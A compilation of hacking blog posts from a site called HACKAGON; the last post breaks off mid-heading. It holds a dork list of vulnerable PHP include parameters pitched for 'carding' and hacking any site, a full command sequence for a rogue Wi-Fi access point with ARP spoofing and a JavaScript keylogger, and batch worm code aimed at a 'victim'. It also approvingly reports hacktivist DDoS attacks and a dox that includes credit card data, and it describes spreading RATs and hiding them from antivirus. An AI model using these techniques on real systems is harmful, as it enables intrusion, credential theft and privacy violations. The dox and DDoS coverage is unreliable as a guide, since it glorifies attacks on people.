sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefix

So above is all latest sqli carding dorks of 2017-18. these are all 5000+ latest sqli carding dorks 2017. By using these carding dorks you can do hack any website.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided the Latest Carding Dorks 2017. So, stay secure and keep learning and if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Cross-Site Scripting (XSS) is a form of security vulnerability typically found in web applications. XSS Attack enables attackers to inject malicious scripts into the web pages viewed by other users. XSS attacks are one of the most prevalent forms of Web Attack, Accounting for an astonishing 12.75% of all web attacks.

What Is Cross-Site Scripting (XSS) ?

XSS is a security abbreviation for Cross Site Scripting. Prominent sites affected by XSS Attacks in the past include; Twitter, Facebook, MySpace & Youtube. In recent years, XSS vulnerabilities have become one of the most prevalent exploited security vulnerabilities. Approximately 70% of all web vulnerabilities are XSS related.

How Does An XSS Attack Work ?

Step #1 Hackers design a malicious script usually with the purpose of mining user data like usernames, passwords or billing details.

Step #2 Hackers inject the malicious script into a legitimate website, The script acts as a hidden layer to the user, similar to the concept behind an illicit ATM Skimmer.

Step #3 Hackers then receive feedback from the script, successfully harvesting user data.

Types Of XSS Attacks

1. Reflected Attack (Type-II XSS / Non-Persistent XSS): A reflected Attack is where the injected script is reflected off a web server as a request, such as a normal search result, error message or subsequent link. Reflected attacks target users differently, often masquerading in emails or hidden links. The browser executes the code because it came from a ‘trusted’ server.

2. Stored Attack (Type-I XSS / Persistent XSS): A stored Attack is the script that is injected and stored on the target servers, such as in a comment, database or forum. The script may then be executed while a legitimate user is using the site.

XSS Attack Statistics

XSS Attack Statistics

Mitigation

1. Blacklisting & Whitelisting: Two very basic techniques you can use to sanitize incoming data similar to that of parameterized inputs for migrating SQL Injection Attacks; Whitelisting uses a list of approved data, that can only be executed. Whitelisting is the most secure. Blacklisting uses a list of prohibited data to exclude from execution.

2. Application Security: At its core Barricade works like an early warning system against any attempts at breaching the security of your servers. By using attack mitigation products like Barricade you can be a step ahead of the game. Barricade quietly watches in the background and can identify any security threats. In the event, there is any serious activity Barricade notifies you and provide detailed steps needed to solve the situation.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided a healthy knowledge about XSS Attack. So, stay secure and keep learning and if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


“GHOST SQUAD HACKERS TOOK DOWN CNN WEBSITE” On Saturday of April 16th, the Anonymous collective, Ghost Squad Hackers DDoS’d CNN’s website into oblivion and remained down until the following day. The group has been in contact with The Last American Vagabond for the month of April so far, and have given us scoops on some of their recent hacks, including a massive dox release on the Israeli Defense Force in an attempt to shed more light on the Zionist/Imperialist agenda that is decimating the Middle East.

Ghost Squad Hackers Take Down CNN Website

Having a conversation with HACKAGON, A member of Ghost Squad Hackers, an Anonymous-Affiliated Group told us that the group Targeted CNN websites in the response of the silence of Palestine.

Take a look below at Hacked CNN Website

cnn website hacked

Message to CNN: http://www.cnn.com.br/ #TangoDown #GhostSquadHackers ~ CNN your security has been breached by Ghost Squad Hackers. We’ll make sure the media outlets that matter receives the message ~ We are Ghost Squad Hackers Expect Us, … or don’t.

Claiming that the Mainstream Media is dying and obsolete, Ghost Squad shared in their communication that they had an utmost respect for independent and authentic media and that this was the inspiration for their attack on CNN, part of what they are calling, Operation: SILENCE or #OpSilence. Ghost Squad stated that they intended for this to be just the beginning–highlighting Fox News as the next target–that the Mainstream Media has become one of the biggest and most blatant oppositions towards citizens, with its funding from the same corporate elitists that are funding the political campaigns of practically all politicians in office in some way. They also questioned why more so-called Anons were not seeking this type of expression and activism, seeming to imply that at the Ghost Squad, they shared our sentiments of confusion by the recent actions of other Anonymous factions. This begs speculation of how much the Anonymous movement has been divided by things like disinformation, convoluted personal agendas, and even Government Intelligence connections.

Through our communication, The Last American Vagabond has come to believe in the authenticity of the Ghost Squad Hackers. The Vagabond does not know anything about these hackers other than their collective’s basic info, but the idea of these hackers being Government Intel or some type of computer-bot is entirely implausible at this point, the only room for possibility left being that one can never rule anything out entirely.

Thus far, the Ghost Squad has been entertaining with their traditional hacker smugness and confidence, and here at the Vagabond, we are increasingly intrigued by the hackers’ unfolding plan. Hopefully, this could mark a change in how hacktivism and hackers interact with the media. It is time to cut out the corporate middleman of the mainstream and go right to the citizens who are ready and deserving of real activism and real information, and this means dealing with independent media. As well, it is time to hold higher standards and a greater sense of accountability for hackers calling themselves “activists”–because a great deal of these people using these altruistic terms seems to have very personalized agendas.

As an afterthought, #OpSilence could certainly be considered by skeptics as an infringement on the Freedom of Speech, but realistically, these are the rules of Man and not of Nature. One has the Freedom of Speech, as far as Natural Law goes, until someone decides to revoke that freedom from them, and this is often something that is decided simply by the whim of the majority. Today, there is an increasingly overwhelming amount of American citizens who are completely fed up with the heavy slants and spins given to the information that is paid to make its way into their living rooms–and things like Bill O’Reilly’s “No-Spin Zone” is something so insidious and discredited that it is physically sickening to watch. The point of the matter is this: only when looking at the fight from the angle of the Elitist is this an infringement of free speech, and in reality, this is the reclamation of free speech. The Freedom of Speech was infringed upon when Corporate America took their citizen’s media and information away from them and began distorting it with their monetized agendas.

While there surely should have been better methods for handling this in the past, it is quite possible that the direct approach the Ghost Squad Hackers are taking could be one of the only approaches left when dealing with the outright collective disease that the Mainstream Media has become.

We hope that HACKAGON provided a knowledgeable article to our multitude readers. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


A rogue access point (also called rogue AP), is any Wi-Fi access point that is installed on a network but is not authorized for operation on that network and is not under the management of the network administrator. Rogue access points often do not conform to wireless LAN (WLAN) security policies, and additionally, can allow anyone with a Wi-Fi device to connect to your network. So, Learn How To Create Rogue Access Point For Attack In Kali Linux.

Create Rogue Access Point For Attack In Kali Linux

Let’s Understand The Rogue Access Point With Infographics

rogue access point

Steps To Create Rogue Access Point For Attack In Kali Linux

1. Install isc-dhcp-server

apt-get install isc-dhcp-server

2. set monitor mode

airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

3. Configure dhcpd.conf

leafpad /etc/dhcp/dhcpd.conf
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 192.168.2.0 netmask 255.255.255.0 {
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name “FreeWifi”;
option domain-name-servers 61.XXX.XXX.1,61.XXX.XXX.1,192.168.1.1;
range 192.168.2.100 192.168.2.110;
}

4. Create fake AP using airbase-ng

airbase-ng -e FreeWifi -c 6 wlan0mon

5. Configure at0 interface

ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

6. Start DHCP Server

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

7. Run mitmf

mitmf -i at0 –spoof –arp –gateway 192.168.2.1 –jskeylogger –hsts

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope HACKAGON have provided one of the best way to Create Rogue Access Point For Attack. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Annoy your Friend/Victim with your own Folder Blaster Worm.

Folder Blaster Worm

What Is A Folder Blaster Worm?

Folder Blaster Worm is a batch file that opens up the bunch of applications all at once but it doesn’t allow you to close them.

How Does The Folder Blaster Worm Work?

The logic behind Folder Blaster is to create and open a lot of folders with an infinite loop and the best part of this folder blaster is that it disallow the victims from closing the generated folders.

How Do You Create A Folder Blaster Worm?

  1. Begin with opening up a new text file and turning off echo by typing “@echo off”.
  2. Then change the directory to Desktop by typing “cd ./Desktop”.
  3. Now create 10 folders with names 0-9 by typing “md 0”, “md 1” and so on.
  4. Now type anything after a colon, for example, :confirm. You then set up a label.
  5. Now start opening up all the 10 folders by typing “start 0”, “start 1” and so on. Now the final statement causes an infinite loop by typing “goto” and the words you typed in earlier, for example, goto confirm.

What Countermeasures Should We Take?

Unfortunately, there aren’t any countermeasures that someone can take to prevent this from happening to them but luckily this isn’t a deadly worm, it won’t cause your computer to crash, it’s merely an annoying trick. On the upside, it is an easy fix if it happens to you. All that needs to be done is for you to go to your task manager and end the task of the CMD file.

Most of the commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient Microsoft OS). These DOS (Disk Operating System) commands can also be used in the command prompt window. Whatever your batch file does, you can do it through the command line interface (CLI).

Start “Run”, or simply hit [Windows key + R]. Type “cmd”, and you’re presented with the CLI. You can type “help” to get a list of commonly used commands and their functions. I recommend you try out each and every single command you can find. Hacking is getting more and more user-friendly every day, CLIs are being replaced by GUIs (Graphical User Interfaces) – meaning in most places you won’t have to actually type in the commands, you can just select an option and press a button. But as of now, this is a work in progress. With more advanced hacking techniques, especially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI. So, Before getting to the code, let’s take a look at a couple of commands.

md / mkdir:  Make Directory, This command is used to create a directory (a folder).

cd:  Change Directory, This command is used to change the current directory.

Here we’ve got the Folder Blaster Worm. Again, this one’s fairly easy to understand. What we’re doing below is creating a bunch of folders, opening them all at once and keeping them open, effectively hogging a big portion of the screen and memory causing the windows to lag, freeze up and sometimes crash.

@echo off
cd ./Desktop
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
:confirm
start 1
start 2
start 3
start 4
start 5
start 6
start 7
start 8
start 9
start 0
goto confirm

So, we beginning with turning off echo. Then we changed the directory to Desktop. Now we created ten folders with names 0-9. We set up the label and start opening up all the 10 folders. Now the final statement causes an infinite loop. Of course, if the folder is already opened it will not be opened again. But the use of this infinite loop is if the user attempts to close the folder, the loop is still going on and it will send a message to open that folder again. So the victim will be stuck as every time s/he closes a folder it opens up again, eventually making them give up and restart the system.

The above code can be made much shorter with the use of LOOPs, as discussed below. We’ll start by creating a variable and setting its value to 0. We are going to use this variable as a check to let the computer know when to come out of the loop. Take a look at the code first:

@echo off
set /a i=0
:loop
if %i%==10 goto end
echo This is iteration %i%.
set /a i=%i%+1
goto loop
:end

Where “set” is used to define and initialize a variable. Here we create a variable called “i” and set it’s value to zero. After setting up a label, we check if the value of the variable “i” (given by %i%) is equal to 10, and if it is we “goto” the label end (the program ends when this happens). Now we “echo” (send a message) to notify the user which iteration is currently running. In the next step, we increment the value of “i” by one and then go back to the “if” statement.

So the loop runs ten times (0-9) and then stops. The above was not a worm, but a simple program. Earlier, I told you that the above Folder Blaster worm code can be made shorter by using loops. You know how to make the worm, and now you know how to use loops. Combining the two of them, I leave as an exercise for the wannabe hacker.

(HINT: See the folder names up top going from 0-9 ? You can just replace them with %i% in the above loop & in the end don’t forget to save the file in .bat extension. )

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope HACKAGON have provided one of the best worm/virus to have fun with your Friend’s/Victim. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Ghost Squad Hackers Leaked Personal Info Of Israel Defence Forces

“Ghost Squad Hackers Leaked Personal Info Of Israel Defence Forces”. The first attack of #OpIsrael started in 2013 when certain branches of the Anonymous hacker collective decided to launch coordinated cyber attacks against Israeli websites on the eve of the Holocaust Remembrance Day, which that year fell on April 8.

Ever since then, the group has been launching similar operations each year, on the same date, and in a recent statement posted on one of its websites, it has said it will continue in 2016 as well. In spite of the fact that, this year, Holocaust Remembrance Day is on May 4, the attacks will still take place on April 7.

Talking to HACKAGON, A member of Ghost Squad Hackers, an Anonymous-Affiliated Group, told that the group Hacked and Leaked Information of Israel Defence Forces at “https://ghostbin.com/paste/m9vxe.

In the leaked information dox, they provided a release of 8,000 IDF family members Phone numbers, Full names and 10,000 personal emails they’ve also included 1000 Israeli IDF soldiers facebook accounts, Israeli Air Force Facebook accounts, and Israeli border Police/Patrol Facebook accounts, And Credit Cards belonging to Israeli IDF family members and IDF soldiers. They have also provided Commanders of Israeli Air Force, Commanders at Israeli Defense Forces. This Data release is in retaliation to the ongoing slaughter and genocide and atrocities committed on the Palestinian people, by the Israeli government set out to conquer Palestine in imperialistic methods of genocide.

Below Are The Sights Of Some Leaked Data.

Important Israeli Targets

Israeli Air Force Pilots and gov Officials list

Israeli Border Police and Patrol

1000 IDF Soldiers

Israeli Credit Cards leaked

Israeli phone number emails leaked

Watch the group’s most recent video on Isreal Cyber Attack here at HACKAGON and follow the conversation across social media at #OpIsreal.

We hope that HACKAGON provided a knowledgeable article to our multitude readers. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


opTrump Anonymous Declared War against Donald Trump

The Anonymous Group Ghost Squad Hackers Took Down Trumps Websites. “#opTrump – Anonymous Declared War against Donald Trump.” Hacktivist collective Anonymous has threatened to take down 2016 presidential hopeful Donald Trump, this time declaring “Total War” on the GOP frontrunner. Anonymous’ war plan against Trump includes dismantling the candidate’s online presence and digging for dirt on the business tycoon in an attempt to destroy his brand.

According to a video posted on YouTube on March 4th, this plan of attack includes a specific timeline. April 1 was the takedown date for TrumpChicago.com, and Anonymous recruited and still recruiting supporters to aid in its attack.

“Donald Trump, think twice before you speak anything, Said a masked member of Anonymous in a video at the time. “You have been warned.”

In that video, the Anonymous representative makes clear that the group is welcoming all willing participants to join in the group’s so-called war on Trump — with or without hacking experience. “This is a call to protect our future, our freedom and our very way of life,” Reads the hacktivist group member during the video.

Talking to HACKAGON, A member of Ghost Squad Hackers, an Anonymous-Affiliated Group that hacked Ethiopian websites in response to the killing of protesting students, told that the group took down Donald Trump‘s 2 websites “Trump.com” and “trumphotelcollection.com” hosted on CloudFlare and flooded it with DDoS Attacks.

Below is the sight of Attacked “Trump.com” “Trumphotelcollection.com”

trump.com

trumphotelcollection.com

Anonymous’ words for Donald Trump: “Dear Donald Trump, we have been watching you for a long time and what we see is deeply disturbing, Your inconsistent and the hateful campaign has not only shocked the United States of America, you have shocked the entire planet with your appalling actions and ideas.”

Additionally, the group is also aiming to hack some US-based websites — including some famous universities — to send a message to Donald Trump. The hacker told, “The reason we choose universities is, to let the generation know what they are up against and what kind of leader will lead them,”.

It would appear that Anonymous is now ready to scale up its efforts to dismantle Trump’s candidacy, this time with a clearer plan of attack. Watch the group’s most recent video on Trump here at HACKAGON and follow the conversation across social media at #OpTrump.

https://www.youtube.com/watch?v=Ciavyc6bE7A

We hope that HACKAGON provided a knowledgebale article to our multitude readers. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

 


History says that Phishing Attacks are one of the most common security challenges that both individuals and companies face in keeping their information secure. You should always be careful about giving out personal information over the Internet. Luckily, companies have begun to employ tactics to fight against phishers, but they cannot fully protect you on their own. Remember that you may be targeted almost anywhere online, so always keep an eye out for those “Phishy” schemes and never feel pressurize to give up personal information online.

phishing

What Is Phishing ?

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

Communications purporting to be from popular social websites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware etc. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.

Different Types Of Phishing Techniques:

1# Spear Phishing: Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success. This technique is, by far, the most successful on the internet today, accounting for 91% of attacks.

2# Clone Phishing: A type of phishing attack whereby a legitimate, and previously delivered, the email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original. This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email.

3# Whaling: Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks. In the case of whaling, the masquerading web page/email will take a more serious executive-level form. The content will be crafted to target an upper manager and the person’s role in the company. The content of a whaling attack email is often written as a legal subpoena, customer complaint, or executive issue. Whaling scam emails are designed to masquerade as a critical business email, sent from a legitimate business authority. The content is meant to be tailored for upper management, and usually involves some kind of falsified company-wide concern. Whaling phishers have also forged official-looking FBI subpoena emails and claimed that the manager needs to click a link and install special software to view the subpoena.

4# Link Manipulation: Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are the common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually, this URL points to the “yourbank” (i.e. phishing) section of the example website. Another common trick is to make the displayed text for a link (the text between the <A> tags) suggest a reliable destination when the link actually goes to the phishers’ site. Many email clients or web browsers will show previews of where a link will take the user to the bottom left of the screen while hovering the mouse cursor over a link. This behavior, however, may in some circumstances be overridden by the phisher.

5# Filter Evasion: Phishers have even started using images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. However, this has led to the evolution of more sophisticated anti-phishing filters that are able to recover hidden text in images. These filters use OCR (Optical Character Recognition) to optically scan the image and filter it. Some anti-phishing filters have even used IWR (Intelligent Word Recognition), which is not meant to completely replace OCR, but these filters can even detect cursive, hand-written, rotated (including upside-down text), or distorted (such as made wavy, stretched vertically or laterally, or in different directions) text, as well as text on colored backgrounds.

6# Website Forgery: Once a victim visits the phishing website, the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar or by closing the original bar and opening up a new one with the legitimate URL.

An attacker can even use flaws in a trusted website’s own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic because they direct the user to sign in at their bank or service’s own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.

A Universal Man-In-The-Middle (MITM) Phishing Kit, discovered in 2007, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.

To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites (a technique known as “Phlashing”). These look much like the real website but hide the text in a multimedia object.

7# Covert Redirect: Covert Redirect is a subtle method to perform phishing attacks that make links appear legitimate, but actually redirect a victim to an attacker’s website. The flaw is usually masqueraded under a login popup based on an affected site’s domain. It can affect OAuth 2.0 and OpenID based on well-known exploit parameters as well. This often makes use of Open Redirect and XSS vulnerabilities in the third-party application websites.

Normal phishing attempts can be easy to spot because the malicious page’s URL will usually be different from the real site link. For Covert Redirect, an attacker could use a real website instead by corrupting the site with a malicious login popup dialogue box. This makes Covert Redirect different from others.

8# Phone Phishing: Not all phishing attacks require a fake website. Messages that claimed to be from a bank told users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) was dialed, prompts told users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

9# Tabnabbing: This technique takes advantage of tabbed browsing, with multiple open tabs. This method silently redirects the user to the affected site. This technique operates in reverse to most phishing techniques in that it doesn’t directly take you to the fraudulent site, but instead loads their fake page in one of your open tabs.

10# Evil Twins: This is a phishing technique that is hard to detect. A phisher creates a fake wireless network that looks similar to a legitimate public network that may be found in public places such as airports, hotels or coffee shops. Whenever someone logs on to the bogus network, fraudsters try to capture their passwords and/or credit card information.

Precautions Against Phishing:

  1. Guard Against Spam: Be especially cautious of emails that Come from unrecognized senders and ask you to confirm personal or financial information over the Internet and/or make urgent requests for this information.
  2. Communicate personal information only via phone or secure websites. In fact, When conducting online transactions, look for a sign that the site is secure such as a lock icon on the browser’s status bar or a “https:” URL whereby the “s” stands for “secure” rather than an “http:”.
  3. Beware of phone phishing schemes. Do not divulge personal information over the phone unless you initiate the call. Be cautious of emails that ask you to call a phone number to update your account information as well.
  4. Do not click on links, download files or open attachments in emails from unknown senders. It is best to open attachments only when you are expecting them and know what they contain, even if you know the sender.
  5. Never email personal or financial information, even if you are close with the recipient. You never know who may gain access to your email account, or to the person’s account to whom you are emailing.
  6. Beware of links in emails that ask for personal information, even if the email appears to come from an enterprise you do business with. Phishing web sites often copy the entire look of a legitimate web site, making it appear authentic. To be safe, call the legitimate enterprise first to see if they really sent that email to you. After all, businesses should not request personal information to be sent via email.
  7. Protect your computer with a firewall, spam filters, anti-virus and anti-spyware software. Do some research to ensure you are getting the most up-to-date software, and update them all regularly to ensure that you are blocking from new viruses and spyware.
  8. Check your online accounts and bank statements regularly to ensure that no unauthorized transactions have been made.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding Phishing Attacks. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


We can introduce an RAT (aka Remote Administration Tool) as hacker’s plague spreading tool with a heavy vicious bite. Here, HACKAGON will make you learn everything you need to start the “Plague”. But to go further, we need to clear up the basics first so, here we go.

RATs are the so-called magic wand of Hacker’s.

Remote Administration Tool

What Is Remote Administration Tool?

A Remote Administration Tool (RAT) is a piece of software that allows a remote “Operator” to control a system as if he has physical access to that system. While Desktop Sharing and Remote Administration have many legal uses, “RAT” software is usually associated with the criminal or malicious activities such as controlling remote PC’s, stealing victims data, deleting or editing some files. One can infect someone else by sending them a file called “Server”. If and when this server file is opened, it burrows itself deep in the system and starts to run in the background. Further, it may also send the attacker a message every time it’s active like when a computer is turned on.

How To Spread Remote Administration Tool?

Some RATs can spread over P2P (peer to peer) file sharing services (Torrents mostly), messenger and email spams (MSN, Skype, AIM, etc.) while other may tag along hiding behind some other software. The user installs something, clicks “Next” 5–6 times and voila! Without anyone ever finding out the RAT has compromised a system.

How To Control Remote Administration Tool Server?

Once installed, the RAT server can be controlled via an RAT client. Basically, it’s just an application that tracks your RAT’s movements. It tells you how many systems are infected, information on their system, versions of OS and other software, their IP address etc. It shows a whole list of IP addresses which may be connected to immediately. After connecting, you can make the computer do pretty much anything like you can send keylogger, uninstall their antivirus, crash their whole system, etc.

What is port forwarding?

In computer networking, Port Forwarding or port mapping is an application of Network Address Translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall.

If you’re a gamer or are used to download torrents, you must’ve heard “Port Forwarding” as a way to increase download speeds, reduce lag, etc. In general Port forwarding refers to the redirecting of computer signals to follow specific electronic paths into your computer. The logic behind this shit is, if the computer signal finds its way into your computer a few milliseconds quicker, it will add up to be a possibly dramatic speed increase for your game or your downloading. Don’t start jumping around just yet, your internet connection is probably already optimized for maximum performance (It is so, by default).

Example: A Pencil-thin network cable (that goes into the network adapter) at the back of your computer contains 65,536 microscopic pathways inside it. Your network cable is just like a major highway, except your network cable has freaking 65,536 lanes, and there is a tollbooth on each lane. We call each lane as a “Port”. (FYI, 2^16 = 65,536. So, that tells us 2 bytes = 16 bits in all is sort of the “width” of network cables, which gives us 65,536 different possible combinations – hence, the same number of ports.)

Your internet signal is comprised of millions of tiny little cars that travel on these 65,536 lanes. We call these little cars as “Packets”. These packets can travel as quick as the speed of light, but they do observe a stop-and-go set of rules, where they are required to stop at each major network intersection as if it were a border crossing between countries, or connecting to a different ISP. At each intersection, the packet must do three things:

  • Find an open port.
  • Pass the identification test, that will allow it through that port, and if not.
  • Move to the next port and try again, until it is allowed to pass through the toll.

In some cases, packets sent by hackers will be caught and held at the intersection, where they will then be dissolved into random electrons. When this happens, it is called “Packet Filtering” or “Packet Sniffing”. Likewise, if a hacker gains control of a much-used port, he can control every bit of information that passes through it – Read it, modify or even delete it.

All in all, Port Forwarding is when you command your network router to proactively identify and redirect every packet to travel on specific electronic lanes. Instead of having every packet stop at each port in turn until it finds an open port, a router can be programmed to expedite the process by identifying and redirecting packets without having them stop at each port. Your router then acts like a type of hyper-fast traffic policeman who directs traffic in front of the toll booths.

Can An Antivirus Catch An Remote Administration Tool?

Yes, Actually, Hell Yeah! As a hacker, you will find antiviruses blocking your path at every damn step. But, like every problem, this too has a solution – “Encryption”. It’s called making your server “FUD (Fully Undetectable)”.

Example: Typically encrypted formats, let’s say the password protected .zip or .rar files (if they contain malicious software) can be caught by an Antivirus. Making a program FUD does pretty much the same thing, except it does so like a drunkard with OCD (Obsessive-Compulsive Disorder). What I mean is, running the software through an encryption program again and again so that nothing can recognize what it is and it can pass off as random harmless noise. Something called “Hex Editing” is a well-known way to go about doing this. This is a whole different topic in itself. So, more on this later.

Legal Or Illegal?

Well, some RATs are legal, and some are not. Legal are the ones without a backdoor, and they have the ability to close connection anytime.(Backdoor is something that gives the attacker access to the victim’s system without their knowledge). Plus these are not really referred to as RAT’s, that’s just our (hacker’s) dirty language where the Illegal ones are used for hacking and they may possibly steal data (or worse). A few examples are written below:

Legal:

  1. TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
  2. UltraVNC – Remote support software for on demand remote computer support.
  3. Ammyy Admin – Like TeamViewer, Ammyy Admin is another reliable and friendly tool for remote computer access.
  4. Mikogo – Mikogo is an Online Meeting, Web Conferencing, Remote Support tool where you can share your screen with several participants in real-time over the Web.

The above tools while very useful and very legal, require a green light from both the parties involved. That’s the main difference between the ones above and the ones below:

Illegal (Or Barely Legal):

  1. Spy-Net
  2. Cerberus Rat
  3. CyberGate Rat
  4. SubSeven
  5. Turkojan
  6. ProRat

These all are used for one purpose – Causing trouble, to say the least. RATs like the ones above are meant to be stealthy. After all, no hacker will want their victims to get a message like: “Congratulations! You have been infected!” (Or maybe let the Antivirus find it). Use any of these on an actual victim, and you will get a ticket to jail, or, at least, a fine. But these are actually used, and mostly without anyone ever suspecting anything wrong. The thing is, hacking is becoming much more of a serious business than a game. An RAT that simply crashes the OS or formats the hard disk gives nothing to the attacker, So why bother doing it in the first place? RAT’s today are evolving (pun unintended). They are becoming more like “parasites” instead of predators. They may be used for DDOSing (by creating massive botnets with tens of thousands of slave computers), clicking ads in the background (the usual click fraud), increasing blog and youtube “views”, even using the compromised systems to “earn money online”, by pushing surveys, exploiting the websites which offer a pay-per-install model, even “mining” bitcoins (Bitcoins are just a fancy new online currency. Bitcoins can be earned by devoting CPU power, then converted into real money, hence their potential exploitation by using RATs).

What’s DNS Host?

A DNS Hosting is a service that runs Domain Name System Servers. Most, but not all, domain name registrars include DNS hosting service with registration. Free DNS hosting services also exist. Many third-party DNS hosting services provide Dynamic DNS.

In general, Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates meaningful human understandable Domain Names into the Numerical (Binary) Identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.

What Can Remote Administration Tool Do?

  • Manage files (Delete/Modify).
  • Controls Web Browser (Change homepage, open a website, etc.).
  • Get System Information (OS Version, AV name, RAM Memory, Computer name, Network Addresses, etc.).
  • Get Passwords, CC numbers or private data, etc (via Keylogger).
  • View and control remote desktop (Take the screenshot or a snap from the webcam).
  • Record camera, sound (Control mic and camera).
  • Controls victims I/O devices (mouse, keyboard, printer, etc.).

Pretty much everything you can do on your own computer, except play GTA V remotely. (Although technically, you can do that too)

Chances Of Getting Traced?

